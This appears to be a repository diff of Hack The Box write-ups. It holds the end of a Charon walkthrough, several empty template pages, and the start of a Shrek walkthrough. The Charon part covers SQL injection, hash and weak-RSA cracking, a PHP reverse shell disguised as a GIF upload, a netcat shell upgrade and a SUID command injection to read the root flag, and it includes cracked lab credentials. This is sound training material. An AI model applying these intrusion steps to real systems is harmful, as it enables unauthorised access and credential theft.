As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.11/23 ] [ /dev/pts/10 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.31 --max-retries 0 -Pn --min-rate=500 | grep Discovered
[sudo] password for nothing:
Discovered open port 22/tcp on 10.10.10.31
Discovered open port 80/tcp on 10.10.10.31
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.11/23 ] [ /dev/pts/10 ] [~]
→ nmap -sCV -p22,80 10.10.10.31
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 18:44 BST
Nmap scan report for 10.10.10.31
Host is up (0.027s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09:c7:fb:a2:4b:53:1a:7a:f3:30:5e:b8:6e:ec:83:ee (RSA)
| 256 97:e0:ba:96:17:d4:a1:bb:32:24:f4:e5:15:b4:8a:ec (ECDSA)
|_ 256 e8:9e:0b:1c:e7:2d:b6:c9:68:46:7c:b3:32:ea:e9:ef (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Frozen Yogurt Shop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.89 seconds
## **Part 2 : Getting User Access**
our nmap scan picked up port 80 so let's investigate it:
![](prg/3/001.png)
[ 10.10.14.11/23 ] [ /dev/pts/10 ] [~]
→ nikto -h http://10.10.10.31/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.31
+ Target Hostname: 10.10.10.31
+ Target Port: 80
+ Start Time: 2020-08-08 18:46:07 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 9f2, size: 552d7084393f2, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7863 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2020-08-08 18:51:23 (GMT1) (316 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
` charo
Doesn't look like there's man things here for us to make use of, so let's use gobuster
[ 10.10.14.11/23 ] [ /dev/pts/11 ] [~]
→ gobuster dir -u http://10.10.10.31/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x "txt,php,html,js,xml,pdf"
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.31/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html,js,xml,pdf,txt
[+] Timeout: 10s
===============================================================
2020/08/08 18:50:04 Starting gobuster
===============================================================
/about.html (Status: 200)
/index.md (Status: 200)
/product.html (Status: 200)
/contact.html (Status: 200)
/images (Status: 301)
/blog.html (Status: 200)
/css (Status: 301)
/js (Status: 301)
/include (Status: 301)
/fonts (Status: 301)
/cmsdata (Status: 301)
/server-status (Status: 403)
===============================================================
2020/08/08 19:09:12 Finished
===============================================================
the idea here was to run gobuster again into the /cmsdata directory in order to find the login.php webpage:
[ 10.10.14.11/23 ] [ /dev/pts/11 ] [~]
→ gobuster dir -u http://10.10.10.31/cmsdata/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.
txt -t 50 -x "txt,php,html,js,xml,pdf"
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.31/cmsdata/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,php,html,js,xml,pdf
[+] Timeout: 10s
===============================================================
2020/08/08 19:13:49 Starting gobuster
===============================================================
/images (Status: 301)
/scripts (Status: 301)
/menu.php (Status: 302)
/login.php (Status: 200)
/upload.php (Status: 302)
/css (Status: 301)
/js (Status: 301)
/include (Status: 301)
/forgot.php (Status: 200)
Progress: 89237 / 220561 (40.46%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/08/08 19:21:32 Finished
===============================================================
` ![](prg/3/002.png)
So here we on /cmsdata/login.php we stumble upon a SuperCMS login php page. There isn't much on the login page itself so we take a look at the "forgot password?" page and inspect the request with burpsuite:
![](prg/3/003.png) ![](prg/3/004.png)
Here we get a generic error that email isn't found, But let's test out and see if we can trigger a SQL injection:
![](prg/3/005.png)
Here we see something is up, let's poke at it further by using the "-- -" string to comment out the query , which should remove the error, and verify that we are dealing with a SQL injection:
![](prg/3/006.png)
Now that we know it is a SQL injection, we can test it further:
![](prg/3/007.png) ![](prg/3/008.png)
So now we know the 4th field takes in a string, which is an email,so let's poke around the sql injection further:
![](prg/3/009.png)
and we found the supercms database! Now let's find the name of the table containing those emails
![](prg/3/010.png)
So far we know we are in the supercms database, and looking at the table called "license", But with further enumeration we find another table called "operators":
![](prg/3/011.png)
So now we have the name of the tables, we will enumerate the columns:
![](prg/3/012.png) ![](prg/3/013.png) ![](prg/3/014.png)
Now we know the table Operators contains the columns __username_ and __password_
![](prg/3/015.png)
So now let's just dump the usernames and passwords:
![](prg/3/016.png) ![](prg/3/017.png)
And we found credentials ! **super_cms_adm:0b0689ba94f94533400f4decd87fa260** however the password is hashed, so we use hash-identifier to figure out which format it is :
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~]
→ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: 0b0689ba94f94533400f4decd87fa260
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
And we see that it is a md5 hash, we can use john or hashcat in conjunction with wordlists, but for this example we'll just use an online hash cracker: https://www.onlinehashcrack.com
![](prg/3/018.png) ![](prg/3/019.png)
And finally we have the credentials **super_cms_adm:tamarro** So we use them to login:
![](prg/3/020.png)
Once logged in we see a big red flag, we are able to upload an image, so we'll try to inject a reverse shell there:
![](prg/3/021.png)
So here let's make our own simple php reverse shell:
![](prg/3/022.png)
But when we upload it we see that we need to make sure the file extension is correct:
![](prg/3/023.png)
So let's disguise our reverse php shell as a gif, making sure the magicbytes are also correct:
![](prg/3/024.png) ![](prg/3/025.png)
Here we see 2 interesting things once we upload our reverse php gif : we get the **relative** path of our gif : ../images/nothing.php.gif and a hidden input with a b64 name
![](prg/3/026.png)
Unsure as to what to do with that, we'll just try to access our reverse php gif and get a reverse shell:
![](prg/3/027.png) ![](prg/3/028.png)
Now that we see our reverse php gif not working, that's where we know we have to make use of this "testfile1" which is a new imput field to the form named testfile1 and setting the value to writeup.php, causes the page to rename the uploaded file to the value specified. So let's intercept the upload.php webpage itself in bursuite, in order to modify the php file itself,in order to have a the new "testfile1" input field:
![](prg/3/030.png)
Now that we have the request, we do Action > Do intercept > Response to this Request and then just hit "forward"
![](prg/3/032.png)
Then we make sure the other input field is uncommented and named properly and forward the request:
![](prg/3/033.png)
This allows us to submit a gif file to then rename it to a php file, so let's submit it and browse to it:
![](prg/3/034.png)
It uploads successfully so let's browse to it at **http://10.10.10.31/images/nothing.php** :
![](prg/3/035.png)
And there we have a reverse shell as www-data ! now let's poke around but before that let's upgrade our reverse shell to a fully interactive one:
www-data@charon:/var/www/html/freeeze/images$ which python
which python
/usr/bin/python
Python is there for us to use, so let's use the pty module to spawn a TTY shell:
www-data@charon:/var/www/html/freeeze/images$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@charon:/var/www/html/freeeze/images$ ^Z
[1]+ Stopped nc -lvnp 9001
[ 10.10.14.8/23 ] [ /dev/pts/16 ] [~]
→ stty raw -echo
[ 10.10.14.8/23 ] [ /dev/pts/16 ] [~]
→ nc -lvnp 9001
www-data@charon:/var/www/html/freeeze/images$
www-data@charon:/var/www/html/freeeze/images$
www-data@charon:/var/www/html/freeeze/images$
once we got the tty shell from python, we background our netcat process with CTRL+Z then type in stty raw -echo and then **fg** to get back into our netcat reverse shell and we now have our fully interactive reverse shell:
www-data@charon:/var/www/html/freeeze/images$ ls -lash
ls -lash
total 904K
4.0K drwxr-xrwx 3 root root 4.0K Aug 13 14:43 .
4.0K drwxr-xrwx 8 root root 4.0K Jun 26 2017 ..
72K -rwxr-xr-x 1 root root 72K Dec 23 2016 berries.png
4.0K -rwxr-xr-x 1 root root 1.2K Dec 23 2016 bg-border.gif
64K -rwxr-xr-x 1 root root 62K Dec 23 2016 bg-header-about.jpg
152K -rwxr-xr-x 1 root root 152K Dec 23 2016 bg-home.jpg
4.0K -rwxr-xr-x 1 root root 994 Dec 23 2016 bg-transparent.png
20K -rwxr-xr-x 1 root root 19K Dec 23 2016 blackberry.jpg
20K -rwxr-xr-x 1 root root 19K Dec 23 2016 blueberry.jpg
20K -rwxr-xr-x 1 root root 19K Dec 23 2016 cantaloupe.jpg
4.0K -rwxr-xr-x 1 root root 2.7K Dec 23 2016 check-in.png
4.0K -rwxr-xr-x 1 root root 3.7K Jun 23 2017 f.png
24K -rwxr-xr-x 1 root root 21K Dec 23 2016 grapes.jpg
24K -rwxr-xr-x 1 root root 21K Dec 23 2016 green-apple.jpg
16K -rwxr-xr-x 1 root root 13K Dec 23 2016 icons.png
20K -rwxr-xr-x 1 root root 17K Dec 23 2016 kiwi.jpg
8.0K -rwxr-xr-x 1 root root 7.1K Jun 23 2017 logo.png
20K -rwxr-xr-x 1 root root 18K Dec 23 2016 mango.jpg
60K -rwxr-xr-x 1 root root 60K Dec 23 2016 map.jpg
4.0K drwxr-xr-x 2 root root 4.0K Dec 23 2016 mobile
84K -rwxr-xr-x 1 root root 82K Dec 23 2016 new-chills.png
4.0K -rw-r--r-- 1 www-data www-data 83 Aug 13 14:43 nothing.php
4.0K -rw-r--r-- 1 www-data www-data 83 Aug 13 13:56 nothing.php.gif
84K -rwxr-xr-x 1 root root 82K Dec 23 2016 on-diet.png
20K -rwxr-xr-x 1 root root 20K Dec 23 2016 pineapple.jpg
4.0K -rw-r--r-- 1 www-data www-data 103 Jun 26 2017 small.png
20K -rwxr-xr-x 1 root root 20K Dec 23 2016 strawberry.jpg
116K -rwxr-xr-x 1 root root 116K Dec 23 2016 strwberry-delights.jpg
20K -rwxr-xr-x 1 root root 20K Dec 23 2016 yogurt.jpg
www-data@charon:/var/www/html/freeeze/images$ cd /home/
www-data@charon:/home$ ls
decoder
www-data@charon:/home$ cd decoder/
www-data@charon:/home/decoder$ ls -lash
total 40K
4.0K drwxr-xr-x 3 decoder freeeze 4.0K Jun 26 2017 .
4.0K drwxr-xr-x 3 root root 4.0K Jun 23 2017 ..
4.0K -rw-r--r-- 1 decoder freeeze 220 Sep 1 2015 .bash_logout
4.0K -rw-r--r-- 1 decoder freeeze 3.7K Jun 25 2017 .bashrc
4.0K drwx------ 2 decoder freeeze 4.0K Jun 23 2017 .cache
4.0K -rw-r--r-- 1 decoder freeeze 654 Jun 25 2017 .profile
4.0K -rw------- 1 decoder freeeze 601 Jun 26 2017 .viminfo
4.0K -rw-r--r-- 1 decoder freeeze 138 Jun 23 2017 decoder.pub
4.0K -rw-r--r-- 1 decoder freeeze 32 Jun 23 2017 pass.crypt
4.0K -r-------- 1 decoder freeeze 33 Jun 23 2017 user.txt
www-data@charon:/home/decoder$ cat user.txt
cat: user.txt: Permission denied
www-data@charon:/home/decoder$ file decoder.pub && file pass.crypt
decoder.pub: ASCII text
pass.crypt: data
www-data@charon:/home/decoder$
after poking around a bit we found out that we (www-data) couldn't read the user flag, but we have access to decoder.pub and pass.crypt
www-data@charon:/home/decoder$ cat decoder.pub
-----BEGIN PUBLIC KEY-----
MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhALxHhYGPVMYmx3vzJbPPAEa10NETXrV3
mI9wJizmFJhrAgMBAAE=
-----END PUBLIC KEY-----
www-data@charon:/home/decoder$ cat pass.crypt
2OSb"eWgTo7I
So let's just save both locally (it's easy since they are small files, you can just copy paste them into nano)
[ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
→ ls
nothing.php.gif
[ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
→ wget http://10.10.10.31:9999/decoder.pub
--2020-08-13 15:50:36-- http://10.10.10.31:9999/decoder.pub
Connecting to 10.10.10.31:9999... ^C
[ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
→ nano decoder.pub
[ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
→ nano pass.crypt
[ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
→ ls -lash
total 24K
4.0K drwxr-xr-x 2 nothing nothing 4.0K Aug 13 15:52 .
4.0K drwxr-xr-x 4 nothing nothing 4.0K Aug 13 14:34 ..
4.0K -rw-r--r-- 1 nothing nothing 138 Aug 13 15:51 decoder.pub
4.0K -rw-r--r-- 1 nothing nothing 83 Aug 13 15:19 nothing.php.gif
4.0K -rw-r--r-- 1 nothing nothing 1.0K Aug 13 15:18 .nothing.php.gif.swp
4.0K -rw-r--r-- 1 nothing nothing 13 Aug 13 15:52 pass.crypt
Here we'll crack the weak RSA key using RsaCtfTool.py:
[ 10.10.14.8/23 ] [ /dev/pts/18 ] [~/_HTB/Charon]
→/opt/RsaCtfTool/RsaCtfTool.py --publickey decoder.pub --uncipher pass.crypt
[+] Clear text : nevermindthebollocks
And we have decoder's password! so let's login via ssh as the decoder user:
[ 10.10.14.8/23 ] [ /dev/pts/18 ] [~/_HTB/Charon]
→ ssh decoder@10.10.10.31
The authenticity of host '10.10.10.31 (10.10.10.31)' can't be established.
ECDSA key fingerprint is SHA256:V1uA1jbcL+1r8UE/foqVjb2u9rSiGTP6EB1Q374Zp9o.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.31' (ECDSA) to the list of known hosts.
decoder@10.10.10.31's password:
Permission denied, please try again.
decoder@10.10.10.31's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-81-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
34 packages can be updated.
23 updates are security updates.
$ id
uid=1001(decoder) gid=1001(freeeze) groups=1001(freeeze)
$ cat user.txt
0fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it ! We have been able to print out the user flag.
## **Part 3 : Getting Root Access**
To be able to read the root flag, we first need to privesc, so we find the files with the SUID bit set and find a file called supershell in /usr/local/bin directory
$ find / -perm -4000 2>/dev/null
**/usr/local/bin/supershell**
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/newuidmap
/bin/ntfs-3g
/bin/ping6
/bin/mount
/bin/fusermount
/bin/umount
/bin/ping
/bin/su
When we run this binary we find that we can run any shell command using it. So we can use it to open the root.txt file:
$ supershell "/bin/ls$/
> cat /root/root.txt
> "
Supershell (very beta)
++[/bin/ls$/
cat /root/root.txt
]
sh: 1: /bin/ls$/: not found
c5XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it ! We have been able to read the root flag.
## **Conclusion**
Here we can see the progress graph :
![](img/3_graph.png)

66
Hard/30.md Normal file
View file

@ -0,0 +1,66 @@
# ForwardSlash Writeup
![](img/30.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/31.md Normal file
View file

@ -0,0 +1,66 @@
# Quick Writeup
![](img/31.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/32.md Normal file
View file

@ -0,0 +1,66 @@
# Travel Writeup
![](img/32.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/33.md Normal file
View file

@ -0,0 +1,66 @@
# Blackfield Writeup
![](img/33.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/34.md Normal file
View file

@ -0,0 +1,66 @@
# Intense Writeup
![](img/34.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/35.md Normal file
View file

@ -0,0 +1,66 @@
# Unbalanced Writeup
![](img/35.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/36.md Normal file
View file

@ -0,0 +1,66 @@
# Feline Writeup
![](img/36.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/37.md Normal file
View file

@ -0,0 +1,66 @@
# Compromised Writeup
![](img/37.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/38.md Normal file
View file

@ -0,0 +1,66 @@
# Reel2 Writeup
![](img/38.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/39.md Normal file
View file

@ -0,0 +1,66 @@
# Sharp Writeup
![](img/39.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

636
Hard/4.md Normal file
View file

@ -0,0 +1,636 @@
# Shrek Writeup
![](img/4.png)
## Introduction :
Shrek is a hard linux box released back in august 2017
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.27/23 ] [ /dev/pts/18 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.47 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Discovered open port 80/tcp on 10.10.10.47
Discovered open port 22/tcp on 10.10.10.47
Discovered open port 21/tcp on 10.10.10.47
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.27/23 ] [ /dev/pts/18 ] [~]
→ nmap -sCV -p21,22,80 10.10.10.47
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 19:04 BST
Nmap scan report for 10.10.10.47
Host is up (0.029s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 2d:a7:95:95:5d:dd:75:ca:bc:de:36:2c:33:f6:47:ef (RSA)
| 256 b5:1f:0b:9f:83:b3:6c:3b:6b:8b:71:f4:ee:56:a8:83 (ECDSA)
|_ 256 1f:13:b7:36:8d:cd:46:6c:29:6d:be:e4:ab:9c:24:5b (ED25519)
80/tcp open http Apache httpd 2.4.27 ((Unix))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Unix)
|_http-title: Home
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.10 seconds
## **Part 2 : Getting User Access**
Our nmap scan says that port 80 is opened, so let's investigate it:
![](prg/4/001.png)
[ 10.10.14.27/23 ] [ /dev/pts/18 ] [~]
→ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x "xml,php,html,js,txt" -u http://10.10.10.47/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.47/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,xml,php,html,js
[+] Timeout: 10s
===============================================================
2020/08/10 19:08:04 Starting gobuster
===============================================================
/images (Status: 301)
/uploads (Status: 301)
/upload.php (Status: 200)
/upload.html (Status: 200)
/About.html (Status: 200)
/Index.html (Status: 200)
/Gallery.html (Status: 200)
/Sitemap.html (Status: 200)
/memes (Status: 301)
/shrek (Status: 301)
so the interesting webpages here are /uploads.html and /uploads.php:
![](prg/4/002.png)
When we upload any file there we get redirected to /uploads.php:
![](prg/4/003.png)
Looking at /uploads we get a directory listing which contains a bunch of malware but the timestamps show us that it's probably not going to help us:
![](prg/4/004.png)
The interesting file to lookat here is secret_ultimate.php:
![](prg/4/005.png)
However we don't get to see the php comments, so we hit CTRL+U to view the sourcecode:
![](prg/4/006.png)
Which hints us to the /secret_area_51/ directory:
![](prg/4/007.png)
So apparently we get a mp3 containing some music, but the trick here was to inspect the end of the song because there was some extra static in the end after the music fades out:
![](prg/4/009.png)
The trick here was to inspect this static in Spectogram:
![](prg/4/010.png)
Here we see something interesting at the top of the stereo channels under spectogram settings we increase the max frequency times 10 which reveals the following message:
![](prg/4/011.png) ![](prg/4/012.png)
And looks like we got ftp credentials! **donkey:d0nk3y1337!** so we login via ftp:
[ 10.10.14.8/23 ] [ /dev/pts/5 ] [~/_HTB/Shrek]
→ ftp 10.10.10.47
Connected to 10.10.10.47.
220 (vsFTPd 3.0.3)
Name (10.10.10.47:nothing): donkey
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 9216 Aug 14 09:01 0a935efe212d455eaba901f743e76a1f.txt
-rw-r--r-- 1 0 0 7168 Aug 14 09:01 129a5d725798449cbe35c14226c21ec8.txt
